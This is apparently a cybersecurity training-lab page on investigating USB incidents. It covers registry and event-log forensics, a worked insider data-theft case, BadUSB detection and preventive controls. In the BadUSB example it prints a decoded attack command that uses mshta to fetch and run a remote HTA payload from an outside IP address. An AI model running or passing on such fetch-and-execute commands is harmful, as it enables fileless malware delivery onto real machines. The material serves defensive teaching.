Master the dual-threat USB investigation — forensically reconstructing what device connected when using Windows registry and setupapi, determining exactly what data was accessed using object access auditing, assessing DLP policy violations by data classification, detecting BadUSB/HID attacks through process creation logs, and applying the preventive controls that close the USB threat surface.
USB Threat Investigation
USB devices present a dual threat: introducing malware into networks and enabling insider data exfiltration. Windows logs every USB connection forensically — device identity, connection time, and files accessed. A trained analyst can reconstruct exactly what happened from these log sources, producing evidence suitable for HR action, legal proceedings, or malware response depending on the investigation type.
The Dual Threat — Two Very Different Investigation Paths
A USB insertion event can be one of two fundamentally different security incidents, and it's important to identify which type early — they require different investigation approaches, different evidence standards, and different response actions:
An authorised user plugs in a personal USB drive and copies sensitive data to it. The device is a standard storage device. The user is the threat. Evidence must meet the standard for HR action or legal proceedings: chain of custody, bit-accurate forensic copy of logs, and policy document showing the user was aware of the prohibition.
Key questions: What data was copied? Does the data classification constitute a reportable breach? Has the data left the building?
A user plugs in a USB device (their own, a dropped device, or a device handed to them) that contains malware or that emulates a HID keyboard. The device is the threat. Evidence focus shifts to execution logs, process creation, and network connections made after the device was plugged in.
Key questions: Did anything execute from the USB? Has a payload been dropped? Is there a C2 connection? Is the endpoint compromised?
Windows keeps a USB insertion diary that never forgets. Every USB storage device that has ever been plugged into a Windows machine leaves a permanent record in the registry — like a hotel's visitor log that records every guest's name, room number, and check-in time, even if the guest checked out years ago. The setupapi log records the first time a device was ever seen on this specific machine. The USBSTOR registry key records every subsequent visit. If you know how to read these records, you can tell the difference between a device that was plugged in for 3 minutes this morning and a device that has been connecting regularly for 18 months — including the exact times of each visit.
Windows USB Evidence Sources
Event Log System -- Event 2003/2100 (USB storage device connected) Event Log Security -- Event 4663 (file accessed on USB drive letter) Registry HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR (device history) Setupapi C:\Windows\INF\setupapi.dev.log (first-seen timestamp per device) Prefetch C:\Windows\Prefetch\ (did any executable run from the USB drive?) LNK files C:\Users\[user]\AppData\Roaming\Microsoft\Windows\Recent\ (recently opened)
USB Investigation in Practice
USBSTOR records every USB storage device ever connected — vendor, model, serial number, and timestamps. This is the first step in any USB investigation: identify the device precisely.
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR" /s Disk&Ven_SanDisk&Prod_Cruzer_Blade SerialNumber: 4C530001120628107282 FriendlyName: SanDisk Cruzer Blade USB Device First Connected: 2026-05-14 09:23:44
Event ID 4663 records file access when object access auditing is enabled. The USB drive letter (E:, F:, G:) identifies USB-related access events in the log.
Event 4663 -- Object Access Time: 2026-05-14 09:24:12 Account: CORP\j.doe Object: E:\HR_Files\salary_data_2026.xlsx Access: ReadData | WriteData Time: 2026-05-14 09:24:45 Account: CORP\j.doe Object: E:\HR_Files\employee_records.xlsx
Compare files accessed against the organisation's data classification policy to determine violation severity and required notifications.
Files accessed via USB drive E: by CORP\j.doe on 2026-05-14: salary_data_2026.xlsx Classification: RESTRICTED employee_records.xlsx Classification: CONFIDENTIAL DLP Policy: USB transfer of RESTRICTED data = Immediate reportable violation USB transfer of CONFIDENTIAL data = Policy violation (HR action) Severity: HIGH -- preserve evidence, notify HR, legal hold on endpoint
A BadUSB device emulates a keyboard and types commands at machine speed. Process creation logs reveal the injection — the "parent" process is cmd.exe or PowerShell with no user-initiated context.
Event 4688 -- New Process Created Time: 2026-05-14 10:02:01 Process: powershell.exe CommandLine: powershell -w hidden -enc JABzAGgAZQBsAGwA... Parent: cmd.exe (no user-initiated context -- cmd appeared at USB insertion time) # HID/BadUSB injection confirmed -- decode the base64 payload # USB inserted at 10:01:58; cmd spawned at 10:02:00; PowerShell at 10:02:01 # Timing correlation with USB insertion = definitive BadUSB indicator
What You Need to Know
Complete USB Evidence Source Reference
Each forensic source provides different evidence about different aspects of the USB event. A thorough investigation consults all sources — they cross-corroborate each other and fill different gaps in the timeline.
| Source | Location | What It Proves | Limitation |
|---|---|---|---|
| USBSTOR Registry | HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR | Device vendor, product, serial number, friendly name. Every device ever connected to this machine. | Does not record how long the device was connected or what was accessed. |
| setupapi.dev.log | C:\Windows\INF\setupapi.dev.log | First time this specific device was ever connected to this machine. Critical for establishing the history of the relationship between user/machine and device. | First-seen only — subsequent connections not recorded here. |
| Event 4663 (Security Log) | Windows Security Event Log | Exact files accessed, access type (read/write/delete), account, and timestamp. The definitive evidence for what data was accessed. | Requires object access auditing to be pre-configured. Not available if auditing was disabled. |
| Event 2003/2100 (System Log) | Windows System Event Log | USB storage device connected/disconnected events. Timestamps for connection and removal — establishes the session duration. | Device identifier only — no file access information. |
| Prefetch files | C:\Windows\Prefetch\ | Whether any executable ran from the USB drive. Prefetch records execution path including drive letter — executables from E:, F:, G: indicate USB-based execution. | Only records files that Windows pre-fetched for performance. Not enabled on Windows Servers by default. |
| LNK files (Shell Items) | %APPDATA%\Microsoft\Windows\Recent\ | Recently opened files — including files opened from external drives. Timestamps in LNK metadata may differ from Event 4663 timestamps, providing corroborating evidence. | Created by Windows Explorer file opens — may not capture all access methods (e.g., command-line copies). |
BadUSB and HID Attacks — Bypassing Storage-Focused Controls
BadUSB attacks exploit a fundamental aspect of the USB standard: any USB device can identify itself to the host operating system as any device class. A USB drive can claim to be a keyboard. A charging cable can claim to be a network adapter. A device disguised as a novelty item can claim to be a mouse, then type commands, then claim to be a storage device to exfiltrate files — all in the same session.
This capability bypasses the most common USB security control: blocking storage device access. A DLP policy that prevents files from being written to USB storage does nothing against a device that presents itself as a keyboard — keyboards don't have storage, so the DLP policy doesn't apply. The "keyboard" types commands, downloads a payload from the internet, and executes it without ever writing to storage.
Why HID Attacks Are Hard to Prevent and Easy to Detect
Prevention of HID attacks is difficult because blocking all HID devices would prevent legitimate mice and keyboards. The practical controls are physical (USB port blockers, locked-down physical access), policy (Rubber Ducky-type devices are physically distinctive — user awareness training helps), and endpoint (application allowlisting prevents unsigned code execution regardless of delivery mechanism).
Detection, by contrast, is straightforward once you know the signature: a process spawned immediately after a USB device is inserted, from a parent process (cmd.exe, PowerShell) that has no user-initiated context, executing with suspicious flags (-w hidden, -enc, -nop). The timing correlation between USB insertion (Event 2003/2100) and process creation (Event 4688) is the definitive detection signal.
Correlating USB insertion time with process creation to confirm HID injection, then decoding the payload to understand what the device attempted to do.
--- Correlate USB insertion time with process spawning --- Event 2100 (System Log): Time: 10:01:58 USB Device Connected: "USB HID Device" (no storage class) Event 4688 (Security Log): Time: 10:02:00 Process: cmd.exe Parent: explorer.exe CommandLine: cmd /k Event 4688 (Security Log): Time: 10:02:01 Process: powershell.exe Parent: cmd.exe CommandLine: powershell -w hidden -nop -enc JABzAGgAZQBsAGwA... # 2 seconds from USB insertion to PowerShell = HID device typing at machine speed --- Decode the base64 payload --- [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("JABzAGgAZQBsAGwA...")) $shell = New-Object -ComObject WScript.Shell $shell.Run("mshta http://185.220.101.45/payload.hta") # Device typed a PowerShell command to download and execute a remote HTA file # This is a fileless malware delivery -- no file written to USB storage # Check: did mshta.exe execute? Check network logs for connection to 185.220.101.45
Insider Data Exfiltration — From Alert to Evidence Package
Alert source: DLP tool fires "USB storage device connected to CORP-PC-088." The DLP does not log file access — it only detects the connection event. The analyst opens an investigation.
Device identification: USBSTOR registry query identifies the device: SanDisk Cruzer Blade, serial 4C530001120628107282. The setupapi.dev.log shows this exact device has never connected to CORP-PC-088 before — first connection was this morning at 09:23:44. This is not a regularly used backup drive.
File access analysis: Event 4663 logs (object access auditing was pre-configured by IT) show account CORP\j.doe accessed the following from drive E: between 09:24:12 and 09:31:05: salary_data_2026.xlsx (RESTRICTED), employee_records.xlsx (CONFIDENTIAL), org_chart_draft.pptx (INTERNAL), severance_calculations.xlsx (CONFIDENTIAL). Access type for all files: ReadData — consistent with copying to USB.
Context check: CORP\j.doe's employment record: notified of redundancy 3 days ago, last day is Friday. The HR system confirms j.doe has legitimate access to these files in their role as HR Manager. The question is not whether access was authorised — it is whether removal from the premises via USB was authorised.
Policy assessment: The HR data handling policy explicitly states: "RESTRICTED and CONFIDENTIAL data may not be copied to removable storage devices." DLP policy violation confirmed. RESTRICTED classification (salary data) triggers mandatory breach assessment under data protection regulation.
Evidence preservation: Legal hold placed on CORP-PC-088. Forensic copy of event logs made before any system changes. Chain of custody documented. HR and Legal notified. Access to j.doe's accounts suspended pending the investigation.
Closing the USB Threat Surface
USB incidents are more preventable than most other incident types because the threat vector is physical and the controls are well-understood. The following controls address the two USB threat categories independently.
Endpoint DLP with file-level blocking: Block writes to USB storage for users whose roles don't require it. For users who legitimately need USB, log all writes to a central SIEM and alert on classified data classifications.
USB device allowlisting: Only permit specific approved USB device serial numbers. All other devices silently blocked. Effective for high-security environments — operationally complex for large organisations.
Object access auditing: Must be pre-configured to be available at incident time. Deploy via Group Policy to all endpoints handling sensitive data. Log to central SIEM for correlation.
Offboarding process: USB access should be explicitly reviewed as part of employee offboarding — particularly for roles with access to sensitive HR, finance, or IP data.
USB port blockers (physical): For high-security workstations, physical port blockers prevent USB insertion entirely. Extreme but effective for air-gapped or classified environments.
HID device allowlisting: Windows Group Policy can restrict which HID device classes are permitted. Allows approved keyboards and mice while blocking unknown HID devices that may be Rubber Ducky-style attack tools.
Application allowlisting: Prevents unsigned or unapproved code execution regardless of delivery mechanism. Even if a BadUSB types a download command, allowlisting prevents the downloaded payload from executing.
User awareness: Physical USB drop attacks (leaving "found" USB drives in car parks for curious employees) are real and documented. Training employees never to plug in unknown USB devices is a genuine control.
Core Concepts Summary
You've covered the theory. Now apply it hands-on in the simulated environment.
Start Lab — IR04 USB Insertion→← Return to all labs